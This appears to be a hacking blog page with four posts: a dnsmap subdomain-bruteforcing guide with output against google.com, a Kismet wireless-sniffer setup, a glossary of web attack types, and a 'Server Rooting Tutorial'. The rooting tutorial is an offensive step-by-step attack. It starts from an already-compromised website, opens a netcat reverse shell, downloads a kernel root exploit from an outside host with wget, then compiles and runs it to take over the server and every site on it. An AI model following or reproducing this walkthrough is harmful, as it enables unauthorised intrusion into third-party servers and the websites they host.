Showing posts with label blacklisted. Show all posts
Showing posts with label blacklisted. Show all posts

Bruteforce Subdomains with DNSMap

1 comment

DNSMap

 This one's really quick - if you've ever needed to know some subdomains of a site, consider "dnsmap". It will bruteforce a bunch of subdomains for any domain you give it - and you can customise your own domain. It's pretty simple. Here's the linux instructions:
DOWNLOAD IT

tar xf dnsmap-latest.tar && cd dnsmap

3. Make sure you have a C compiler installed (i.e. GNU C++ Compiler) and compile it:

gcc dnsmap.c -o dnsmap

4. Make it executable:

chmod +x dnsmap

5. Run it:

./dnsmap domain.com

6. View results:

dnsmap - DNS Network Mapper by pagvac
Searching subhosts on domain google.com

ap.google.com
IP Address #1:209.85.173.103
IP Address #2:209.85.173.104
IP Address #3:209.85.173.147
IP Address #4:209.85.173.99

blog.google.com
IP Address #1:72.14.207.191

catalog.google.com
IP Address #1:74.125.19.100
IP Address #2:74.125.19.101
IP Address #3:74.125.19.102
IP Address #4:74.125.19.113

catalogue.google.com
IP Address #1:74.125.19.113
IP Address #2:74.125.19.100
IP Address #3:74.125.19.101
IP Address #4:74.125.19.102

directory.google.com
IP Address #1:209.85.173.103
IP Address #2:209.85.173.104
IP Address #3:209.85.173.147
IP Address #4:209.85.173.99

download.google.com
IP Address #1:209.85.173.99
IP Address #2:209.85.173.103
IP Address #3:209.85.173.104
IP Address #4:209.85.173.147

downloads.google.com
IP Address #1:209.85.173.147
IP Address #2:209.85.173.99
IP Address #3:209.85.173.103
IP Address #4:209.85.173.104

email.google.com
IP Address #1:74.125.19.100
IP Address #2:74.125.19.101
IP Address #3:74.125.19.102
IP Address #4:74.125.19.113

finance.google.com
IP Address #1:209.85.173.104
IP Address #2:209.85.173.147
IP Address #3:209.85.173.99
IP Address #4:209.85.173.103

groups.google.com
IP Address #1:209.85.171.113
IP Address #2:209.85.171.100
IP Address #3:209.85.171.101
IP Address #4:209.85.171.102

images.google.com
IP Address #1:209.85.173.147
IP Address #2:209.85.173.99
IP Address #3:209.85.173.103
IP Address #4:209.85.173.104

labs.google.com
IP Address #1:74.125.19.113
IP Address #2:74.125.19.100
IP Address #3:74.125.19.101
IP Address #4:74.125.19.102

mail.google.com
IP Address #1:209.85.201.18
IP Address #2:209.85.201.19
IP Address #3:209.85.201.83

mobile.google.com
IP Address #1:209.85.173.193

news.google.com
IP Address #1:209.85.171.99
IP Address #2:209.85.171.103
IP Address #3:209.85.171.104
IP Address #4:209.85.171.147

photo.google.com
IP Address #1:74.125.47.91
IP Address #2:74.125.47.93
IP Address #3:74.125.47.136
IP Address #4:74.125.47.190

photos.google.com
IP Address #1:74.125.47.190
IP Address #2:74.125.47.91
IP Address #3:74.125.47.93
IP Address #4:74.125.47.136

proxy.google.com
IP Address #1:64.233.169.4
IP Address #2:64.233.171.4
IP Address #3:64.233.179.4
IP Address #4:64.233.183.4
IP Address #5:64.233.184.4
IP Address #6:64.233.187.4
IP Address #7:66.102.0.4
IP Address #8:66.102.9.4
IP Address #9:66.102.14.225
IP Address #10:66.102.14.241
IP Address #11:216.239.42.4
IP Address #12:216.239.53.4
IP Address #13:216.239.55.5
IP Address #14:216.239.57.4
IP Address #15:216.239.59.4
IP Address #16:64.233.161.4
IP Address #17:64.233.165.4
IP Address #18:64.233.167.4

research.google.com
IP Address #1:74.125.19.102
IP Address #2:74.125.19.113
IP Address #3:74.125.19.100
IP Address #4:74.125.19.101

sandbox.google.com
IP Address #1:209.85.171.81

search.google.com
IP Address #1:209.85.173.99
IP Address #2:209.85.173.103
IP Address #3:209.85.173.104
IP Address #4:209.85.173.147

services.google.com
IP Address #1:209.85.139.110

shopping.google.com
IP Address #1:209.85.171.103
IP Address #2:209.85.171.104
IP Address #3:209.85.171.147
IP Address #4:209.85.171.99

smtp.google.com
IP Address #1:209.85.237.25

sms.google.com
IP Address #1:209.85.173.147
IP Address #2:209.85.173.99
IP Address #3:209.85.173.103
IP Address #4:209.85.173.104

support.google.com
IP Address #1:74.125.19.101
IP Address #2:74.125.19.102
IP Address #3:74.125.19.113
IP Address #4:74.125.19.100

uploads.google.com
IP Address #1:72.14.243.49

vpn.google.com
IP Address #1:64.9.224.69
IP Address #2:64.9.224.70
IP Address #3:64.9.224.68

www.google.com
IP Address #1:209.85.173.104
IP Address #2:209.85.173.147
IP Address #3:209.85.173.99
IP Address #4:209.85.173.103

www2.google.com
IP Address #1:64.233.179.104

www3.google.com
IP Address #1:64.233.179.104

31 subhost(s) found


Enjoy, and use it legally in your penetration tests.
Read more »

Kismet- A Wireless Sniffer

No comments

kismet
Wardriving a act for searching and locating the access points (APs), as discussed on the wardriving article about the importance of wireless sniffer. These tools use to find out the wireless network, just like netstumbler for windows and Kismac for MAC, there is a Kismet for Linux. Purpose is same to sniff the wireless LAN and try to get maximum information about that network.

Kismet is a wireless network detector and sniffer and it works with any wireless card (NIC card) which supports raw monitoring mode. 
Kismet identifies networks by passively collecting packets and detecting networks, which allows it to detect (and given time, expose the names of) hidden networks and the presence of non-beaconing networks via data traffic.

Download


The single need to run Kismet is Linux OS, this may be a Ubuntu, backtrack or any other, however it can be applicable on windows but this time we consider only Linux, you can get Kismet from here and the second way is via terminal, open terminal and type,
 sudo apt-get install kismet
Kismet Tutorial 
After installation you need to configure Kismet now open terminal and type exactly.
 sudo gedit /etc/kismet/kismet.conf 
Now create the username for login to Kismet window,
suiduser=your_username_here
Now at this stage you have to tell the kismet about the source of wireless adapter to use. The command is
source=type,interface,name
and in my case
source=prism,wlan0,hostap
If you don’t know your relevant network driver, view the Kismet Readme and scroll down to the section “12. Capture Sources”.
Now start Kismet by the following command.
sudo kismet
kismet-text1
Read more »

Types Of Hacking

1 comment

SQLi - SQL Injection, allows to spoof queries and get important data out of the database such as logins etc.
BSQLi - Blind SQL Injection, harder than the normal one and requires much more time.
XSS - Cross site scripting. Allows you to run CSS scripts on websites. Can be useful to steal cookies.
LFI - Local File Inclusion, allows to include a local page. Can be exploited and shell uploaded. Sometimes filtered, but you can bypass it using Null byte Injection .
RFI - Remote File Inclusion, allows you to include a page from a remote host. Usually parses the code into the .php file and executes it.
SSI - Server side includes, like code execution. Affected extensions: .shtm, .shtml and more.
RCE - Remote command/code execution, allows to execute code on the remote host.
Read more »

Server Rooting Tutorial

1 comment

I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:

- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.

Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. Now you see 3 textboxes. Bind to bin/shor backconnect. Type in your IP and the port you want the server to connect (it must be opened on your router.). Now do not press backconnect yet. Download NetCat here:

www.downloadnetcat.com

Extract the files to your desktop in a folder. Now go to Run>cmd. Open cmd. Now type:

cd

Replace with the path of netcat. Okay, now type:

nc -lnvp

Replace with the port you opened and used on the shell.

Now it should display something like this:

Listening on port [any] ...

Minimze this window, and go on the web shell. Type in your IP address and port, click backconnect. If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type 'id' to see your current ID. Let's say your ID is 23. You have control over your website only. But not for long. Now type 'uname -a'. You will get the full kernel version. Simply copy it and google for local root exploits. Let's say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, that is always writeable.

Type this:

cd /tmp

Now let's make a folder for the exploit.

mkdir exploit

cd into this folder.

cd exploit

Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:

wget http://goodbye.fileave.com/localroot.c

Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:

gcc localroot.c -o h00lyshit

Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:

dd if=/dev/urandom of=largefile count=2M

This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:

chmod 777 h00lyshit
chmod 777 largefile

Now let's run the exploit! Type this:

./h00lyshit largefile

Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:

uid=0(root)

You have successfully gained root!

Read more »

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | coupon codes